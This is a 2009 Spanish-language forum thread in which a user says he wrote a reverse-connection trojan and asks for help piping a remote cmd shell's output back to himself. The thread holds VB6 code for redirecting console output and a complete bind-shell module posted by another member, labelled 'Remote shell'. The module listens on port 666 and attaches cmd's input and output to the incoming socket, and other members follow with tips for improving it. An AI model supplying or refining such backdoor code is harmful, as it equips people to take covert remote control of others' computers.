Ayuda con CMD Pipe vb6

Iniciado por hepy_92, 12 Diciembre 2009, 05:06 AM

0 Miembros y 2 Visitantes están viendo este tema.

hepy_92

hola
hace unos años cree un troyano de multiconexion inversa
ahora lo retome ya que lo quiero volver a usar y estoy en proceso para poder enviar comandos a la cmd remota y poder volver a recibir lo que pasa (EJ: pongo dir C:\ y me devuelve el resultado, enlistando los archivos en C:\)
para esto encontre este codigo de cmd pipe

'Redirects output from console program to textbox.
'Requires two textboxes and one command button.
'Set MultiLine property of Text2 to true.
'
'Original bcx version of this program was made by
' dl <dl@tks.cjb.net>
'VB port was made by Jernej Simoncic <jernej@isg.si>
'Visit Jernejs site at http://www2.arnes.si/~sopjsimo/
'
'Note: don't run plain DOS programs with this example
'under Windows 95,98 and ME, as the program freezes when
'execution of program is finnished.

Option Explicit
Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long
Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO)
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Type SECURITY_ATTRIBUTES
  nLength As Long
  lpSecurityDescriptor As Long
  bInheritHandle As Long
End Type

Private Type PROCESS_INFORMATION
  hProcess As Long
  hThread As Long
  dwProcessId As Long
  dwThreadId As Long
End Type

Private Type STARTUPINFO
  cb As Long
  lpReserved As Long
  lpDesktop As Long
  lpTitle As Long
  dwX As Long
  dwY As Long
  dwXSize As Long
  dwYSize As Long
  dwXCountChars As Long
  dwYCountChars As Long
  dwFillAttribute As Long
  dwFlags As Long
  wShowWindow As Integer
  cbReserved2 As Integer
  lpReserved2 As Byte
  hStdInput As Long
  hStdOutput As Long
  hStdError As Long
End Type

Private Type OVERLAPPED
    ternal As Long
    ternalHigh As Long
    offset As Long
    OffsetHigh As Long
    hEvent As Long
End Type

Private Const STARTF_USESHOWWINDOW = &H1
Private Const STARTF_USESTDHANDLES = &H100
Private Const SW_HIDE = 0
Private Const EM_SETSEL = &HB1
Private Const EM_REPLACESEL = &HC2

Private Sub Command1_Click()
  Command1.Enabled = False
  Redirect Text1.Text, Text2
  Command1.Enabled = True
End Sub
Private Sub Form_Load()
    Text1.Text = "ping"
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
  If Command1.Enabled = False Then Cancel = True
End Sub

Sub Redirect(cmdLine As String, objTarget As Object)
  Dim i%, t$
  Dim pa As SECURITY_ATTRIBUTES
  Dim pra As SECURITY_ATTRIBUTES
  Dim tra As SECURITY_ATTRIBUTES
  Dim pi As PROCESS_INFORMATION
  Dim sui As STARTUPINFO
  Dim hRead As Long
  Dim hWrite As Long
  Dim bRead As Long
  Dim lpBuffer(1024) As Byte
  pa.nLength = Len(pa)
  pa.lpSecurityDescriptor = 0
  pa.bInheritHandle = True
 
  pra.nLength = Len(pra)
  tra.nLength = Len(tra)

  If CreatePipe(hRead, hWrite, pa, 0) <> 0 Then
    sui.cb = Len(sui)
    GetStartupInfo sui
    sui.hStdOutput = hWrite
    sui.hStdError = hWrite
    sui.dwFlags = STARTF_USESHOWWINDOW Or STARTF_USESTDHANDLES
    sui.wShowWindow = SW_HIDE
    If CreateProcess(vbNullString, cmdLine, pra, tra, True, 0, Null, vbNullString, sui, pi) <> 0 Then
      SetWindowText objTarget.hwnd, ""
      Do
        Erase lpBuffer()
        If ReadFile(hRead, lpBuffer(0), 1023, bRead, ByVal 0&) Then
          SendMessage objTarget.hwnd, EM_SETSEL, -1, 0
          SendMessage objTarget.hwnd, EM_REPLACESEL, False, lpBuffer(0)
          DoEvents
        Else
          CloseHandle pi.hThread
          CloseHandle pi.hProcess
          Exit Do
        End If
        CloseHandle hWrite
      Loop
      CloseHandle hRead
    End If
  End If
End Sub


para enviar comandos como cd o dir hay que anteponer un "cmd /k" (Ej: cmd /k dir C:\) no me pregunten por que (si alguien me puede explicar porque hay que hacerlo se agradece jajaja)
pero bueno el problema es que al enviar un comando como un dir o cd, me sale este error:
CitarError '9' en tiempo de ejecucion:
el subindice esta fuera del intervalo
ayuda porfavor! gracias de antemano

cobein

Hay una manera de hacer esto correctamente y es conectar el stdio a un socket, despues si tengo un rato lo hago y lo posteo.
http://www.advancevb.com.ar
Más Argentino que el morcipan
Aguante el Uvita tinto, Tigre, Ford y seba123neo
Karcrack es un capo.

hepy_92

ok se agradeceria mucho!
alguna otra idea?
gracias ;D

hepy_92

como saber que timer es el que esta "fuera del intervalo"? y que significa que esta fuera del intervalo? perdon si es algo noob mi pregunta pero hace mucho que no toco el vb 6
CitarError '9' en tiempo de ejecucion:
el subindice esta fuera del intervalo

gracias :)

shaggikpo

en que linea exactamente se produce el error?

cobein

Bien, aca esta el ejemplo

'---------------------------------------------------------------------------------------
' Module      : mMS
' DateTime    : 12/13/2009 20:16
' Author      : Cobein
' Mail        : cobein27@hotmail.com
' WebPage     : http://www.advancevb.com.ar
' Purpose     : Remote shell
' Usage       : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
'               applications, but you may not reproduce
'               or publish this code on any web site,
'               online service, or distribute as source
'               on any media without express permission.
'
' Reference   : NGS - Writing small shellcode paper
'
' History     : 12/13/2009 First Cut....................................................
'---------------------------------------------------------------------------------------
Option Explicit

Private Const INFINITE              As Long = &HFFFF
Private Const SOCK_STREAM           As Long = 1
Private Const AF_INET               As Long = 2
Private Const IPPROTO_TCP           As Long = 6
Private Const STARTF_USESTDHANDLES  As Long = &H100
Private Const STARTF_USESHOWWINDOW  As Long = &H1

Private Const WSADESCRIPTION_LEN    As Long = 257
Private Const WSASYS_STATUS_LEN     As Long = 129

Public Type WSAData
    wVersion                As Integer
    wHighVersion            As Integer
    szDescription           As String * WSADESCRIPTION_LEN
    szSystemStatus          As String * WSASYS_STATUS_LEN
    iMaxSockets             As Integer
    iMaxUdpDg               As Integer
    lpVendorInfo            As Long
End Type

Public Type sockaddr_in
    sin_family              As Integer
    sin_port                As Integer
    sin_addr                As Long
    sin_zero(1 To 8)        As Byte
End Type

Private Type SECURITY_ATTRIBUTES
    nLength                 As Long
    lpSecurityDescriptor    As Long
    bInheritHandle          As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess                As Long
    hThread                 As Long
    dwProcessId             As Long
    dwThreadId              As Long
End Type

Private Type STARTUPINFO
    cb                      As Long
    lpReserved              As String
    lpDesktop               As String
    lpTitle                 As String
    dwX                     As Long
    dwY                     As Long
    dwXSize                 As Long
    dwYSize                 As Long
    dwXCountChars           As Long
    dwYCountChars           As Long
    dwFillAttribute         As Long
    dwFlags                 As Long
    wShowWindow             As Integer
    cbReserved2             As Integer
    lpReserved2             As Byte
    hStdInput               As Long
    hStdOutput              As Long
    hStdError               As Long
End Type

Private Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVR As Long, lpWSAD As WSAData) As Long
Private Declare Function WSACleanup Lib "ws2_32.dll" () As Long
Private Declare Function bind Lib "ws2_32.dll" (ByVal s As Long, ByRef name As sockaddr_in, ByRef namelen As Long) As Long
Private Declare Function listen Lib "ws2_32.dll" (ByVal s As Long, ByVal backlog As Long) As Long
Private Declare Function accept Lib "ws2_32.dll" (ByVal s As Long, ByRef addr As sockaddr_in, ByRef addrlen As Long) As Long
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function htons Lib "wsock32.dll" (ByVal hostshort As Long) As Integer
Private Declare Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal lType As Long, ByVal protocol As Long, ByRef lpProtocolInfo As Any, ByRef g As Any, ByVal dwFlags As Long) As Long
Private Declare Function closesocket Lib "wsock32.dll" (ByVal s As Long) As Long

Public Sub Main()
    Dim lSock       As Long
    Dim tSA         As sockaddr_in
    Dim tWD         As WSAData
    Dim lHandle     As Long
   
    Const PORT As Long = 666
   
    If WSAStartup(&H101, tWD) = 0 Then
        lSock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, ByVal 0&, ByVal 0&, ByVal 0&)
   
        If Not lSock = -1 Then
       
            With tSA
                .sin_family = 2
                .sin_port = htons(PORT)
            End With
           
            If bind(lSock, tSA, Len(tSA)) = 0 Then
   
                If listen(lSock, 0&) = 0 Then
   
                    lHandle = accept(lSock, tSA, Len(tSA))
   
                    Dim tSTARTUPINFO            As STARTUPINFO
                    Dim tPROCESS_INFORMATION    As PROCESS_INFORMATION
                    Dim tSECURITY_ATTRIBUTES    As SECURITY_ATTRIBUTES
   
                    tSECURITY_ATTRIBUTES.nLength = Len(tSECURITY_ATTRIBUTES)
                   
                    With tSTARTUPINFO
                        .cb = Len(tSTARTUPINFO)
                        .dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
                        .hStdInput = lHandle
                        .hStdOutput = lHandle
                        .hStdError = lHandle
                    End With
   
                    If CreateProcessA(vbNullString, "cmd", _
                       tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
                       0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then
   
                        Call WaitForSingleObject(tPROCESS_INFORMATION.hProcess, INFINITE)
                       
                    End If
                End If
            End If
           
            Call closesocket(lHandle)
        End If

        Call WSACleanup
    End If
End Sub


Algunas cosas para que tengan en cuenta.

1- el codigo se va a freezar a la espera de una conexión
2- hay muchas estructuras que se pueden obviar pero las deje pora que el ejemplo sea mas claro.
3- se pueden conectar usando telnet (open localhost 666) en Vista y no se si en 7 telnet no esta instalado por defecto.
http://www.advancevb.com.ar
Más Argentino que el morcipan
Aguante el Uvita tinto, Tigre, Ford y seba123neo
Karcrack es un capo.

Karcrack

Muy bonito el code ;D
Solo una cosa:
                    If CreateProcessA(vbNullString, "cmd", _
                       tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
                       0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then

Envez de 'cmd' creo que seria mejor '%COMSPEC%' ;)

YST

Cita de: Karcrack en 14 Diciembre 2009, 16:59 PM
Muy bonito el code ;D
Solo una cosa:
                    If CreateProcessA(vbNullString, "cmd", _
                       tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, True, 0, _
                       0&, CurDir, tSTARTUPINFO, tPROCESS_INFORMATION) Then

Envez de 'cmd' creo que seria mejor '%COMSPEC%' ;)

¿En que PC no seria cmd ? :xD


Yo le enseñe a Kayser a usar objetos en ASM

hepy_92

no entendi en absoluto lo qe postiaste :S
disculpa mi ignorancia soy newbie... pero qe es eso?

Karcrack

Cita de: YST en 14 Diciembre 2009, 20:23 PM
¿En que PC no seria cmd ? :xD
Cualquier version de W$ anterior a XP :P
De todos modos, variables de entorno ftw!!! :xD